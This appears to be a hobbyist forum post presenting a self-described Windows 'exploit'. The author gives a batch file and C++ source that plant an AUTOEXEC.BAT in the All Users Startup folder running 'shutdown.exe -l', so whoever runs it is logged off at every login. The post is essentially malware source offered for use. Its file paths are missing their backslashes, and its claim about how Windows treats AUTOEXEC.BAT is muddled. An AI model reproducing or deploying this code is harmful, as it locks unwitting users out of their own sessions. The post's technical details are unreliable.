Thanks

Windows Exploit. Form and function.

I've been working on this particular exploit for almost a year (since v1) namely because I don't usually feel like sitting down and learning new concepts in C++ which is what I've coded this exploit in. Basically, I started learning DOS a while back and came across the command shutdown.exe. After finding this command, I thought to myself "Gee, wouldn't it be great if I could make this command kill the Windows session on startup?" And from there what I refer to as Version .01 was born. I discovered Windows checks for a file called AUTOEXEC.BAT on startup under the C: > Documents and Settings > All users > Start Menu > Programs > Startup > (AUTOEXEC.BAT) folder. So you can open up notepad and write the lines:

@echo off
    shutdown.exe -l
    exit

and save the file as AUTOEXEC.BAT and manually move it to the path mentioned above. But this version has obvious limitations. So I began looking into basic file output in C++ and came across fstream. Using fstream, you can output files in a specified location. So open up your C++ editor (I used Dev-C++) and write:

Code:
    #include <iostream>
    #include <stdlib.h>
    #include <stdio.h>
    #include <windows.h>
    #include <fstream.h>

using namespace std;

int main()
    {

ofstream fout("C:documents and settingsall usersstart menuprogramsstartupAUTOEXEC.BAT");
        fout << "@echo offn";
        fout << "shutdown.exe -l";
        fout.close();
        system("shutdown.exe -l");
        return 0;
    //Compiled and tested in Dev-C++ courtesy of Rabbid George
    //Version 1.0
    }